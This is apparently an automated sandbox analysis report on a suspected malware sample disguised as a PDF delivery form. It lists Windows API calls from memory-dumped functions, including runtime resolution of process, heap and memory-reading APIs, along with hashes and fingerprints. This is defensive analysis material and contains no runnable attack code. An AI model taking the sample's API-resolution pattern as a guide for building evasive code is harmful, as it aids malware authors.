Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: c6884e7783331d06a0d50a2cab134fca838da106a747409aaf8cc31213c1efb4
Instruction ID: 248cf2bcbdb723a0efc6d4558542faee154189c5b92b3bbcfdc60389b440edc5
Opcode Fuzzy Hash: c6884e7783331d06a0d50a2cab134fca838da106a747409aaf8cc31213c1efb4
Instruction Fuzzy Hash: 41C092F07C13007EFA645BA95CC2F23A1CDE348B14FA00822BB01EE2D5D6E24DA05A64

Function 02CD4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02CD4BEB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction ID: 69bc00ec4179500b25c245fcf6b0da2f5614492ba2e671a661f5236b155c9991
Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction Fuzzy Hash: 3AB09228288A0228FA2815A20D00B32008C0BA0286F8800919F29C8080EB52C1019832

Function 02CD4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02CD4C03

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: d36beaef2c89e40e5224554208eaef6f1c9325482635e8714df3755d92c3c283
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: 14A022AC000B030A8F3F232C000022A20333FE23023CEC8E883000A0008F3B8000BC30

Function 02CD15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02CD1A03,?,02CD1FC1), ref: 02CD15E2

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 63e60dd2789070400fe8a3fc863d79e026162a2c57265bc51a7da5cc24b11611
Instruction ID: a6899e185a324ed4b5dda88fd6eb4ebd7ea300644e3c78b8e4a2564541be8267
Opcode Fuzzy Hash: 63e60dd2789070400fe8a3fc863d79e026162a2c57265bc51a7da5cc24b11611
Instruction Fuzzy Hash: AFF06DF0B413004FEB15CFB9D9443417BD2E789348F158579D709DB388E7B1A80A8B00

Function 02CD1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02CD1FC1), ref: 02CD16A4

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fad18c348faf7436e1764580855e1dde0b904111855f843a64ff612df0079117
Instruction ID: bdb339a0815ab278c6dbb53dcf2c61539f7bb0ff3ba0f1c2db2426afadae574f
Opcode Fuzzy Hash: fad18c348faf7436e1764580855e1dde0b904111855f843a64ff612df0079117
Instruction Fuzzy Hash: 8FF09AF2A447956BD7119E5ADC80B82BB94FB40326F090139EA489B340D7B0AC108BD4

Function 02CD16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02CD1FE4), ref: 02CD1704

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c9f0cda64f50f112a06729f4a99b1cfb4a0487f40d62eef078201199e50bd6b9
Instruction ID: 77c8da101ad563822d244a2ec439aefe42f98bf317bf7c462507cf268a0b23e1
Opcode Fuzzy Hash: c9f0cda64f50f112a06729f4a99b1cfb4a0487f40d62eef078201199e50bd6b9
Instruction Fuzzy Hash: 49E086753003016FD7105A7A9D407126BD8EB44664F194476F749DB251D2E0E8108B60

Non-executed Functions

Function 02CEA95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CEABE3,?,?,02CEAC75,00000000,02CEAD51), ref: 02CEA970
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CEA988
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CEA99A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CEA9AC
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CEA9BE
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CEA9D0
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CEA9E2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CEA9F4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CEAA06
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CEAA18
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CEAA2A
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CEAA3C
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CEAA4E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CEAA60
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CEAA72
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CEAA84
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CEAA96

Strings

Heap32Next, xrefs: 02CEA9C8
Process32First, xrefs: 02CEA9EC
Heap32First, xrefs: 02CEA9B6
Toolhelp32ReadProcessMemory, xrefs: 02CEA9DA
Heap32ListFirst, xrefs: 02CEA992
CreateToolhelp32Snapshot, xrefs: 02CEA980
Thread32Next, xrefs: 02CEAA46
Process32Next, xrefs: 02CEA9FE
kernel32.dll, xrefs: 02CEA96B
Thread32First, xrefs: 02CEAA34
Module32First, xrefs: 02CEAA58
Module32Next, xrefs: 02CEAA6A
Process32NextW, xrefs: 02CEAA22
Process32FirstW, xrefs: 02CEAA10
Module32NextW, xrefs: 02CEAA8E
Heap32ListNext, xrefs: 02CEA9A4
Module32FirstW, xrefs: 02CEAA7C

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 5a8e2ef63be6afab92f1f7fc54b50cc858e4ec70371ae934ba6c012b4e36c01c
Instruction ID: ff003c1eacb65a0ff0e60fb5445d162fb8b678d0243e3a0fa6dc52e5614ef20f
Opcode Fuzzy Hash: 5a8e2ef63be6afab92f1f7fc54b50cc858e4ec70371ae934ba6c012b4e36c01c
Instruction Fuzzy Hash: F93181B6A84721AFEF11AFA4E885A2A37AEAB06700B500979E507CF204D774E851DF51

Function 02CD58B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD58D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02CD58E8
lstrcpynA.KERNEL32(?,?,?), ref: 02CD5918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000,02CFD790), ref: 02CD59E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338,02CD0000), ref: 02CD5A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CD7338), ref: 02CD5A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02CD5A45

Strings

kernel32.dll, xrefs: 02CD58CC
GetLongPathNameA, xrefs: 02CD58DF
\, xrefs: 02CD59F5

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 2ee64cbcc39eaf167352544b45de0a1d520b250b24f17f925a096ce6e0bc6c5c
Instruction ID: 8576b7a9aa9cb83f473cdcc73a9dc7b553fc7c0f9daf9e0500f81070b0d1aaa3
Opcode Fuzzy Hash: 2ee64cbcc39eaf167352544b45de0a1d520b250b24f17f925a096ce6e0bc6c5c
Instruction Fuzzy Hash: 85416F71E40269AFDB10DBE8CC88AEEB7BDAF48390F4845A5A248E7241D7709B44CF50

Function 02CD5B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CD5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CD5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CD5BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CD5BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CD5C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CD5C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CD5C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CD5C97

Strings

Software\Borland\Locales, xrefs: 02CD5AA8, 02CD5AC6
Software\Borland\Delphi\Locales, xrefs: 02CD5AE4

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: bbc0a39e94a6729e75e08279cf18ecce4f834adf45fd7f99a605d78a3d2d531a
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: A23173B1E4061C3AEB25D6F89C85BEF77AD5B443C0F4805E29708E6181DBB59B848F90

Function 02CD7F5C Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02CD7F7D

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
Instruction ID: d4448b4af649d01569681f3f5e1f70597f595ed80bfe23e88b1866a9f7a9d6f2
Opcode Fuzzy Hash: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
Instruction Fuzzy Hash: 5D11D2B5E00209AFDB04DF99C981DAFF7F9EFCC704B14C569A509EB254E6719A01CB90

Function 02CDA74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
Instruction ID: b7accd407d5a98795ea9f36477d426153bbfa8bb54eb426ebc3562b31e5b49b4
Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
Instruction Fuzzy Hash: 8CE0D83570021417D329A5685C80DF6B35D975C310F00427EFF05C7340FEB09E404AE4

Function 02CDB714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02CFC106,00000000,02CFC11E), ref: 02CDB722

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ba5b935e1461643d2b84f5d3c8702bac15a6e94f6de92f865f528d85490654ab
Instruction ID: 62dd415155857a243635009cfd03fdc008a3ec0948abd51912dc1676b7ef7b56
Opcode Fuzzy Hash: ba5b935e1461643d2b84f5d3c8702bac15a6e94f6de92f865f528d85490654ab
Instruction Fuzzy Hash: 1EF0DA74944301DFC394DF28E540B1977E5FB89714F424A2AE69ACB384E734D814DF62

Function 02CDA798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02CDBDFA,00000000,02CDC013,?,?,00000000,00000000), ref: 02CDA7AB

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
Instruction ID: 332e28c06355ed5c5ac9d711c124ce19ae9ad14395235dbdb29efab40937a061
Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
Instruction Fuzzy Hash: 48D0A7AA30E2603AE320515B2D94D7B5AECCBC97B1F11843EF748C6200D210CC06D7F1

Function 02CD9194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02CD9198

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
Instruction ID: 7d08f828bf3d20ee24158828329d407b99343031302c4a2a8d73b857a9e1aba7
Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
Instruction Fuzzy Hash: A6A01108808C20028A803B280C0223A3088A800A20FE80F82A8F8802E0EE2E0220A0E3

Function 02CDD57A Relevance: .7, Instructions: 724COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4402f85698938614c49bf1d4620913970ec7e2e5c4b59d34d0443433b83ae5ff
Instruction ID: 023ededfea479b861fe0d2ad2fcf4830b12490774dbdac323ab4f80e9bc7c27c
Opcode Fuzzy Hash: 4402f85698938614c49bf1d4620913970ec7e2e5c4b59d34d0443433b83ae5ff
Instruction Fuzzy Hash: EBF1D56384D7C02BDB1317B10A773DA7FF99D03128B6B1ACEC9C64B467A54A058BDB06

Function 02CD20C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

